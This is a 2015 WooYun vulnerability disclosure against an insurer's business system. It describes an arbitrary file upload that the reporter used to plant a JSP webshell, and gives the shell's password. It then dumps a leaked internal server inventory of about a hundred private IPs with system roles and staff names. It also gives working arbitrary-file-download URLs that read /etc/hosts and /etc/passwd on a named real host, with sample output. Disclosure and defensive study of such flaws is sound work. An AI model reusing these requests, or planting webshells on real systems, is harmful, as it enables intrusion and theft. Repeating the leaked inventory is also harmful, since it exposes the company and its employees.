缺陷编号:WooYun-2015-0126092
漏洞标题:国华人寿某业务系统漏洞打包
相关厂商:95549.cn
漏洞作者:路人甲
提交时间:2015-07-11 10:09
公开时间:2015-07-16 10:10
漏洞类型:文件上传导致任意代码执行
危害等级:高
自评Rank:20
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
Tags标签:
2015-07-11: 细节已通知厂商并且等待厂商处理中
2015-07-11: 厂商已查看当前漏洞内容,细节仅向厂商公开
2015-07-16: 厂商已经主动忽略漏洞,细节向公众公开
任意文件上传+任意文件下载漏洞
寿险业务系统http://59.151.39.85/pre/
1#任意文件上传在扫描该系统的时候,我发现了一个urlhttp://59.151.39.85/pre/upload/default.htm
点进去好像还可以上传http://59.151.39.85/pre/upload/sample1.htm
上传成功,但坑爹的是没有回显
自己尝试了一下,发现就在当前上传目录http://59.151.39.85/pre/upload/wooyun.jpg
然后,我试了一下直接上传jsphttp://59.151.39.85/pre/upload/01.jsp
密码:woo9yun成功连接
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 |
服务器<br> 使用空间<br> 所属人10.32.48.32(电子商务)<br> 正常<br> 张智泓、傅士琪10.32.76.85 (电子商务)<br> 正常<br> 张智泓、傅士琪10.32.76.83(电子商务)<br> 正常<br> 张智泓、傅士琪10.56.96.22(电子商务)<br> 正常<br> 张智泓、傅士琪10.56.48.31(电子商务)<br> 正常<br> 张智泓、傅士琪10.32.75.101(核心数据库)<br> 正常<br> DBA10.32.75.102(银保通数据库)<br> 正常<br> DBA10.32.76.110(B节点)<br> 正常<br> DBA10.56.80.41 (C节点)<br> 94%<br> DBA10.32.76.90(核心)<br> 正常<br> 曾智超10.32.76.73(核心)<br> 正常<br> 曾智超10.32.76.74(核心)<br> 正常<br> 曾智超10.32.76.71(核心)<br> 正常<br> 曾智超10.32.76.75(核心)<br> 90%<br> 曾智超10.32.76.76(核心)<br> 正常<br> 曾智超10.32.76.121(核心) 正常<br> 曾智超10.56.80.176(核心)<br> 正常<br> 曾智超10.56.80.177(核心)<br> 正常<br> 曾智超10.32.76.72(核心)<br> 正常<br> 曾智超10.32.48.37(兼业)<br> 正常<br> 曾智超10.32.48.39(兼业)<br> 正常<br> 曾智超10.32.48.40(兼业)<br> 正常<br> 曾智超10.32.76.22(营销报表)<br> 正常<br> 曾智超10.32.76.56(河南农信)<br> 正常<br> 曾智超10.32.76.55(保联天下)<br> 正常<br> 曾智超10.32.76.11(工行后置批处理)<br> 正常<br> 曾智超10.32.76.12(农行后置批处理)<br> 正常<br> 曾智超10.32.76.13(建行后置批处理)<br> 正常<br> 曾智超10.32.76.14(邮储后置批处理)<br> 正常<br> 曾智超10.32.76.15(工行银保通核心)<br> 正常<br> 曾智超10.32.76.16(农行银保通核心)<br> 正常<br> 曾智超10.32.76.17(建行银保通核心)<br> 正常<br> 曾智超10.32.76.18(邮储银保通核心)<br> 正常<br> 曾智超10.32.16.19 (邮政银行前置机)<br> 正常<br> 曾智超10.32.16.20(河北建行前置机)<br> 正常<br> 曾智超10.32.16.21(湖北建行前置机)<br> 正常<br> 曾智超10.32.16.23(天津建行前置机)<br> 正常<br> 曾智超10.32.76.77(团险导入服务器)<br> 正常<br> 崔连喜10.32.76.27(第三方BPM服务器)<br> 正常<br> 曾智超10.32.76.162(农行后置)<br> 正常<br> 曾智超10.32.76.161(工行后置)<br> 正常<br> 曾智超10.32.76.155(中行银保通核心)<br> 正常<br> 曾智超10.32.76.154(中行后置)<br> 正常<br> 曾智超10.32.76.126(邮储后置)<br> 正常<br> 曾智超10.32.76.125(建行后置)<br> 正常<br> 曾智超10.32.76.122(电子商务(电销新流程)前置机)<br> 正常<br> 曾智超10.32.48.70(重庆民亚前置)<br> 正常<br> 曾智超10.32.48.69(辽宁凯塔前置)<br> 正常<br> 曾智超10.32.48.67(湖北民航凯亚前置)<br> 正常<br> 曾智超10.32.48.64(慧保网前置)<br> 正常<br> 曾智超10.32.48.63(金伦前置)<br> 正常<br> 曾智超10.32.48.61(湖南航意险)<br> 正常<br> 曾智超10.32.48.42(保联天下前置机)<br> 正常<br> 曾智超10.32.48.41(Ehome前置机)<br> 正常<br> 曾智超10.32.32.210(河南农信社前置机)<br> 正常<br> 曾智超10.32.16.86(中行前置机)<br> 正常<br> 曾智超10.32.16.48(中行前置机(新流程))<br> 正常<br> 曾智超10.32.16.47(农行前置机LifeKeeper备份(新流程))<br> 正常<br> 曾智超10.32.16.46(中行前置机LifeKeeper备份(新流程))<br> 正常<br> 曾智超10.32.16.18(工行前置机(新上海))<br> 正常<br> 曾智超10.32.16.17(农行前置机(新上海))<br> 正常<br> 曾智超10.32.16.13(华夏银行生产前置(新上海))<br> 正常<br> 曾智超10.32.16.11(湖南建行前置机(新上海))10.32.66.23(投资系统) 正常 赵峰<br> 10.32.76.59(监控服务器) 正常 田伟<br> 10.32.48.75(电子商务) 正常 张智泓、傅士琪<br> 10.32.76.106(电子商务) 正常 张智泓、傅士琪<br> 10.32.76.102(电子商务) 95% 张智泓、傅士琪<br> 10.32.76.109(电子商务) 91% 张智泓、傅士琪<br> 10.32.76.148(核心)<br> 正常<br> 曾智超10.32.76.152(核心)<br> 正常<br> 曾智超10.32.76.179(核心)<br> 90%<br> 曾智超10.32.48.47(ERP)<br> 正常<br> 王磊10.32.48.73(ERP)<br> 正常<br> 王磊10.32.48.29(ERP)<br> 正常<br> 王磊10.32.48.175(ERP)<br> 正常<br> 王磊10.32.48.111(ERP)<br> 正常<br> 王磊 、10.32.48.132(ERP)<br> 正常<br> 王磊10.32.48.82 (在线支付系统) 正常 赵峰 傅士琪<br> 10.32.76.169 (在线支付系统) 正常 赵峰 傅士琪<br> 10.32.48.83 (在线支付系统) 正常 赵峰 傅士琪<br> 10.32.76.170 (在线支付系统) 正常 赵峰 傅士琪<br> 10.32.48.81(电子商务)<br> 正常<br> 张智泓10.32.76.168(电子商务)<br> 正常<br> 张智泓10.56.81.55 (C节点)<br> 95%<br> DBA |
2#任意文件下载
1 |
http://59.151.39.85/pre/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/hosts |
与我之前提交的漏洞 WooYun: 国华人寿某系统存在任意文件下载漏洞 同一套系统,但不同ip比如http://59.151.39.85/pre/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/hosts
显示的是
1 |
# Do not remove the following line, or various programs # that require network functionality will fail. 127.0.0.1 10_32_48_41.localdomain localhost 10.32.48.41 10_32_48_41.localdomain localhost ::1 localhost6.localdomain6 localhost6 |
而http://broker.guohualife.com/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/hosts显示的是
1 |
# Do not remove the following line, or various programs # that require network functionality will fail. 127.0.0.1 localhost.localdomain localhost ::1 localhost6.localdomain6 localhost6 10.32.48.37 10_32_48_37.localdomain |
所以没有重复哈
1 |
http://59.151.39.85/pre/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/passwd |
上传点过滤,或者加访问权限,下载过滤../
危害等级:无影响厂商忽略
忽略时间:2015-07-1610:10
漏洞Rank:15 (WooYun评价)
暂无
原文连接
的情况下转载,若非则不得使用我方内容。